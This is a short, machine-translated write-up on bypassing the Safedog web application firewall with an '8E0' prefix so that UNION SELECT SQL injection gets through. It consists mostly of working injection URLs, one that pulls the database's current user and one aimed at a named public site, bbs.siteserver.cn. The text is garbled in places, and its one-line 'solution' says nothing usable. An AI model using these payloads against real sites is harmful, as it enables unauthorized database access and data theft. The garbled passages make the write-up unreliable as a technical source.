Website security dog Protection Rule bypass in the latest version
Tested the website security dog APACHE and IIS versions
1. download the latest version of Web Dongle (APACHE) V3.1.09924 from the official website of safedog, And the webhorse repository version is:
Test shows that a protection rule is bypassed.
2. IIS version with http://bbs.siteserver.cn/
Test found that the latest version of the website dongle has this protection rule bypassed ~
1. The latest version of APACHE is V3.1.09924.
1. First, test the union select 1, 2, 3, 4, 5 and later.
2. If the id is changed to 8E0, it will be bypassed.
http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
3. view the current user:
http://192.168.142.128/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,44#
2. Test IIS http://bbs.siteserver.cn/
1. http://bbs.siteserver.cn//siteserver/platform/background_dbSqlQuery.aspx? Id = 1% 20and % 201 = 1
2. If the id is changed to 8E0, it will be bypassed.
Http://bbs.siteserver.cn//siteserver/platform/background_dbSqlQuery.aspx? Id = 8E0union % 20 select % ,,2, 3,4, 5
Solution:
Id = 8E0 repair